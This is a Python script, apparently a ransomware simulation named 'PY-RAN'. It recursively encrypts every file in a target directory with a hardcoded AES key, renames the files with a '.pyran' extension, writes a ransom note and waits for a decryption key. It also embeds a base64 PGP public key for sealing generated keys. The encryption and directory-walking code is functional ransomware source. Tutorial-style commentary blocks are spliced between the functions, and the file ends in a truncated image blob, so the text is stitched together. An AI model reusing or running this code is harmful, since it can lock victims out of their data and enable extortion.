# parser.add_argument("--password",help="Password to use for encryption/decryption.")
# args = parser.parse_args()
def EncryptFile(file, password):
    bufferSize = 64 * 1024
    pyAesCrypt.encryptFile(file, file + ".pyran", password, bufferSize)
    os.remove(file)

def DecryptFile(file, password):
    bufferSize = 64 * 1024
    pyAesCrypt.decryptFile(file, file.split(".pyran")[0], password, bufferSize)
    os.remove(file)
def fast_encrypt(infile, pw):
    # NOTE: pw is currently unused; encryption always uses the hardcoded 16-byte key below.
    if os.path.islink(infile):
        infile = os.path.realpath(infile)
    with open(infile, 'rb') as file_data:
        key = bytes('floofloofloofloo', 'utf-8')
        # print(str(key))
        cipher = AES.new(key, AES.MODE_EAX)
        ciphertext, tag = cipher.encrypt_and_digest(file_data.read())
    with open(infile, 'wb') as file_out:
        [file_out.write(x) for x in (cipher.nonce, tag, ciphertext)]
    os.rename(infile, infile + '.pyran')
def fast_decrypt(infile, pw):
    key = bytes(pw, 'utf-8')
    if os.path.islink(infile):
        infile = os.path.realpath(infile)
    with open(infile, 'rb') as file_data:
        nonce, tag, ciphertext = [file_data.read(x) for x in (16, 16, -1)]
    cipher = AES.new(key, AES.MODE_EAX, nonce)
    data = cipher.decrypt_and_verify(ciphertext, tag)
    with open(infile, 'wb') as outfile:
        outfile.write(data)
    newname = infile.split(".pyran")[0]
    os.rename(infile, newname)
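fast_decrypt depends on fast_encrypt's on-disk framing: a 16-byte nonce, then a 16-byte tag, then the ciphertext until EOF, recovered with the `read(x) for x in (16, 16, -1)` idiom. A stdlib-only sketch of that read pattern (no crypto, just the framing, with placeholder bytes):

```python
import io

# Serialize three fields the way fast_encrypt writes them:
# 16-byte nonce, 16-byte tag, then the ciphertext until end of file.
nonce, tag, ciphertext = b"N" * 16, b"T" * 16, b"payload-bytes"
blob = io.BytesIO(nonce + tag + ciphertext)

# read(-1) at the end consumes the remainder of the stream.
fields = [blob.read(n) for n in (16, 16, -1)]
print(fields == [nonce, tag, ciphertext])  # True
```

Because the nonce and tag have fixed sizes, no length headers are needed; only the variable-length ciphertext must come last.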
def encrypt_data(password, dire='../azure_blob_analytics/'):
    for file in [val for sublist in [[os.path.join(i[0], j) for j in i[2]] for i in os.walk(dire)] for val in sublist]:
        # EncryptFile(file, password)
        try:
            fast_encrypt(file, password)
        except (PermissionError, OSError) as e:
            print(e)
            continue
    print("Encryption Done!")
    f = open("ransom.txt", "w+")
    f.write("PY-RAN ransomware simulation successfully encrypted the files.")
    f.close()
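The nested list comprehension in encrypt_data (and decrypt_data) is just a flattened os.walk: collect every file path under the root directory. A stdlib sketch of the equivalent, more readable traversal, exercised on a throwaway temporary tree (file names here are arbitrary examples):

```python
import os
import tempfile

def walk_files(root):
    # Equivalent to the one-liner above: every file path under root.
    return [os.path.join(dirpath, name)
            for dirpath, _, names in os.walk(root)
            for name in names]

# Build a tiny tree to demonstrate the traversal.
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "sub"))
for rel in ("a.txt", os.path.join("sub", "b.txt")):
    with open(os.path.join(root, rel), "w") as fh:
        fh.write("x")

found = sorted(os.path.relpath(p, root) for p in walk_files(root))
print(found)  # ['a.txt', 'sub/b.txt'] on POSIX
```

Writing it as a two-level generator over `os.walk` avoids the double list-of-lists flattening and reads left to right.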
def decrypt_data(password, dire='../azure_blob_analytics/'):
    for file in [val for sublist in [[os.path.join(i[0], j) for j in i[2]] for i in os.walk(dire)] for val in sublist]:
        try:
            fast_decrypt(file, password)
        except (ValueError, FileNotFoundError) as e:
            # skip files that cannot be decrypted, e.g. files that were never
            # encrypted such as .DS_Store
            print(e)
            continue
    print("Decryption Done!")
def generate_encryption_key(x):
    key = string.ascii_letters
    return ''.join(random.choice(key) for i in range(x))
def pgp_encrypt(x):
    pubkey = """LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCgptUUdOQkdKR01YSUJEQURFbG9n
cVlBT2EvOVc0SUVHTjFBZGJucTZnTGUrNHFKc2V1S3lhaWZYMDdPTkgrczlLCkJ6N2QrVUFyeHdh
U1RuNjR2YXc5K240YUxVWk0zMVVyQldPa1pleDdCaWUxZWFwQ1hGdzZHbjNObDcweDVuUUEKcHQ3
NEFwU0ZJdWRTSFI3UXc5a2I4OWxZV3UzbnBaaDJ4Qk81bVhxd0pMZE5IUXVlbmQ3TGxlQ1gweWdh
U0ZRKwpPNHFORlRISS9ORDZKT29yVEV4OWp3aHJBL2NmWG9aZTFUdXI4ZXRoU2dkQlBLcEtJKzZ1
VFlLZFRKcHBJeDBsCkp3U3hXR3IyZktEMEx6cy83cE5tdXpqdk05d083Q2Zob3NlTk5GdUFudU1M
akxhUklrRUdNcE1jR1ZlZXFyeG4KSHo3MVhiWXRqUTNJa3VlWlJkeU8rdEhBOGRkak1WdVBCbnY4
NzdUWkE4WUxEcGFrUW8vcFhZU2tVeWt4TTR4TQpGaUNHVjRqWWJkek1Tb3QzRVQyNWVBREpjM3dR
SEw1MGhJQ0xucWRyR0VqNENPeEVFN2dVTjFmVkJKbTJIbnBPClBTYkF2TGlQQ3RYS0hUZEdVN3I3
MVZsbWptVjNzZktaODJGTFQxYU1NMEd3QW95Q01CYmhKM1BRTXR6SEZLUWcKTEoxWjZtZDdTOUdl
UG04QUVRRUFBYlFvWm14dmIyWWdQR3hoZG1Gc1pYUjBaV2hsWVd4MGFHTnZkVzVqYVd4QQpaMjFo
YVd3dVkyOXRQb2tCMUFRVEFRb0FQaFloQkJENDgwVjI4bFZlc0xFZ0dadnlEeWJJRTFBaEJRSmlS
akZ5CkFoc0RCUWtEd21jQUJRc0pDQWNDQmhVS0NRZ0xBZ1FXQWdNQkFoNEJBaGVBQUFvSkVKdnlE
eWJJRTFBaGlMOEwKK1FGK3ovSVVZWlg0WDZtcU8vWlBSMy9RNDE2SnNkSmVxc29CTHpvdVUrbVpv
cm1OTHJHbEZIWnd3VWpUTUp4ZAovZmN0cEdiaXJBZk9ra01CU0t6S0ZzeWhsWkRad1lOajcwK2RL
cXJKbityUHBXUnJuZzI5RkxSem9oRVhyQWdyClV3d0ZKdklOSTQyL2s5UTBZUVd6S1VLTDAvOE5N
VFdzemo2YnlNVkxVU3laZm40QlZzTHRJeHhlWEdrdUdvQW0KWkx5UDQzWUE2WWRXMTJRSEluOXlC
aVNiZE1Cd0g3bnNKRzdCK29ROGduNUd2aGNwLzlYeXp3NDRBS3d3b2JJSwpWNXBkc1p6RHF4MytE
TW5hR0V6Mnp4U244R2wxMHc5N09aU3pGd0RhVXFGVWw3VVZwL0xkbUFYQnB4TmlUZ0UrCmZRUlRo
YklQOHlobE9oY3c2TmYxNlovSnNRTjVVdXVqZ0ZMMnIzQTVmQm01WmJzd05yTVBFRXBCaVVsUkhM
cUgKLzQxTFhTRXpIS09XVjd1a2hBVDU5dTlFSXRUVzU1c3FXaUo1dDN6NWVSN3lCTUhTUlJvQks2
NW5ISDdkMjgxaAo2OXFlNWU0eXAwZStUZ2trREViUzR0WnR0K243RTM3RUdFZC95dW5WTGQyazc5
eFZadHdKRFVGdUZVMXNqeFhzClpia0JqUVJpUmpGeUFRd0F2WWtRaGd5aU12MCsyY0w2Q1BQQ1Jl
SzZhTU1sR1p2aVIzK1VhSGlHOFc0ZTNYd3AKMEZ0SytiZStSQ1pVS2l4TzBma3pxWlNHSjRLNkZP
b0l4bGdZU1ppcG8rOG1LS3Q4ZmZKL0MrVytjOS93YzNPNwpQSWVUZmM3Y1ZKWU1SbWF1MjBUUnBQ
QWh4Q2poeHpoZ0Y1Y3ZXRyt2cmJRT1N0OWtzRy91TGFpL0JIdnB0Vk5oCkdYc0NlaVI2R0F1bGY0
cC83TTR5QjZMUVEwck51eURUN2VCYjF5aWVTNnhHUmVpb2hNRXYyekE4RDNBcFRVSHMKRmRvSGpG
K1E0ckhhVVZpbVRza3VyNUtyRTB0RkxrTld0WENsV0drVWpVQXVCQ0lXNGMrTlJESzVHdnhOUHI2
YgpkaHREdHNraGp0TjFHQUdpOVRUb3NtUjcyaXFPZkJkNmFpMFNiVlVGcFozbm1MQjVXYWtkUkhZ
bi91RTVIS3NJCmczcktKbjhiMi9FTzhUMU5SL29NQ1phODhEQkRiNUZlUHViMHN3K3ZGdmpPcGNE
L3BPdlZ1ZkQyRDF2akkwcUMKQWdVZFZnbUJtdE1aMFN6WmFFQ3VybUg0RnluMGZGMnRYRFl3bTJp
aERVSUM4SzRhcUgyQXhyQWJZRGNzZkxxbQpXQ3UyYWhuenNWVnN3Um9OQUJFQkFBR0pBYndFR0FF
S0FDWVdJUVFRK1BORmR2SlZYckN4SUJtYjhnOG15Qk5RCklRVUNZa1l4Y2dJYkRBVUpBOEpuQUFB
S0NSQ2I4ZzhteUJOUUlSNXlDL3dNU1hMd3ZaK0lxcGZlNHdqaU11SUUKeHdvZEVXUE9FbXZwbDI4
TGgvY2ZPNm51UE5SRkRrVFFUVmFCOHpwcWlTWTFMS3hkbENPVnVraENqeTkrTkliQgpUcHYxS1NV
aHZIVFhQOGowcUkzRjBwUythdEJna0k1ZDI2WEZUK2JqaDFRM05tVTVSU01LZWNsYmJvbERCT3Ay
CjJSNUcydmp0aEtIUVNFZkdjOUFUTEU3aEE0djMwSGpzK2xlWVVoVGlXcTJzUDBaZ0JZQmxpTERS
UTlSUzlSMjUKcW9lbFA2T2RSaU5mNk9QVTFPdGdlSkdqZS9MRlRkbTF1ZUpuMGRnQ1Z4R1JHdTVT
S1FLcTRNcnlManJTYndJTApFb043RE9vVXdDZXN4WkorOVF3QkpzdXB5alhuWVpLU0Q1Q0RMVXd6
NTdTQ2xBL2ZUY1JTQzhLQlIvbzU3d2RDCmtNdnRvMEFJTWYvSVloczlualpOU0NOU2ltcWtjQzRm
c253NENsWHlaeURuYkZPK1oyYzdXZ3ZYWldleHpGVVkKUStnN1UrSFR5NFIyTDJnK2Z5ODlzWlBY
OVd1cXBwZ2ttTkdJczlqMnVQQ1QyRkNlRlRwQlc4ck1Fc3BmOU1vQgpjQ3hNRUlxOGtTZ2NTZ0pS
UjBsYnJSaGM5VHJONDdaci9sbmN0TzJpc3RJPQo9MmhDUgotLS0tLUVORCBQR1AgUFVCTElDIEtF
WSBCTE9DSy0tLS0tCg=="""
    decoded_pubkey = base64.b64decode(pubkey)
    key, _ = pgpy.PGPKey.from_blob(decoded_pubkey)
    enc_key = pgpy.PGPMessage.new(x)
    encrypted_x = key.encrypt(enc_key)
    return str(encrypted_x)
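pgp_encrypt keeps the ASCII-armored public key base64-encoded inside the script and decodes it before handing it to pgpy. A minimal stdlib sketch of that encode/decode round trip (the armored text here is a placeholder, not a real key):

```python
import base64

# Placeholder armored block standing in for the real PGP public key.
armored = ("-----BEGIN PGP PUBLIC KEY BLOCK-----\n"
           "...\n"
           "-----END PGP PUBLIC KEY BLOCK-----\n")

# Encode for embedding as a single opaque blob, then decode before use.
encoded = base64.b64encode(armored.encode("utf-8"))
decoded = base64.b64decode(encoded).decode("utf-8")
print(decoded == armored)  # True
```

Note that `base64.b64decode` with the default `validate=False` discards characters outside the base64 alphabet, which is why the newlines inside the triple-quoted `pubkey` string above do not break decoding.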
if __name__ == '__main__':
    # fast_encrypt("./test/test.txt", "floo")
    # fast_decrypt()
    # Define the window's contents
    if len(sys.argv) > 1:
        dir_to_enc = sys.argv[1]
        encrypt_data('floofloofloofloo', dir_to_enc)
        print("please enter your decryption key...")
        while True:
            dec_key = input()
            if dec_key == 'quit':
                exit()
            decrypt_data(dec_key, dir_to_enc)
# data = b'iVBORw0KGgoAAAANSUhEUgAABIAAAAKICAIAAACHSRZaAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAALIISURBVHhe7f1N2qw4krbt7kZmP2JEb635D+rbWtjlpByQ0J+BcO6zEYc/jpCZTEK4MrIq/3//n4iIiIiIiFxCBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIiIiIyEV0ABMREREREbmIDmAiIiIiIiIX0QFMRERERETkIjqAiYiIiIiIXEQHMBERERERkYvoACYiIiIiInIRHcBEREREREQuogOYiIiIiIjIRXQAExERERERuYgOYCIiIiIiIhfRAUxEREREROQiOoCJiIiIiIhcRAcwERERERGRi+gAJiIiIiIichEdwERERERERC6iA5iIiIiIiMhFdAATERERERG5iA5gIiIiIiIiF9EBTERERERE5CI6gImIiIiIiFxEBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIiIiIyEV0ABMREREREbmIDmAiIiIiIiIX0QFMRERERETkIjqAiYiIiIiIXEQHMBERERERkYvoACYiIiIiInIRHcBEREREREQuogOYiIiIiIjIRXQAExERERERuYgOYCIiIiIiIhfRAUxEREREROQiOoCJiIiIiIhcRAcwERERERGRi+gAJiIiIiIichEdwERERERERC6iA5iIiIiIiMhFdAATERERERG5iA5gIiIiIiIiF9EBTERERERE5CI6gImIiIiIiFxEBzAREREREZGL6AAmIiIiIiJyER3ARERERERELqIDmIiIyKT+3//7f//3f//HHyIi8hN0ABMREZlCOG4d4rKIiPwEHcBERERG4tjU6v/+7//49EG/IiLyE3QAExGRd+FY02p/QFplLvUgbxER+Qk6gImIyK/h4JJ2eFJyOj71Y1QiIvITdAATEZFH4nTyAgxYRER+gg5gIiLyMPG/qir511bT/qutQ5btJmdGLiIiz6cDmIiIPEY4imxOJlWHqyeexAzjFxGR59MBTEREHoCDSB+PA9g1hzqqICIiz6cDmIh44ZfjB9+KVLL1M8+/vLolE2ohIiLPpwOYiIzB78Rv+Z+q3CmSxloZZ56DXFCeDOUQEZHn0wFMRBrxw3AEehT5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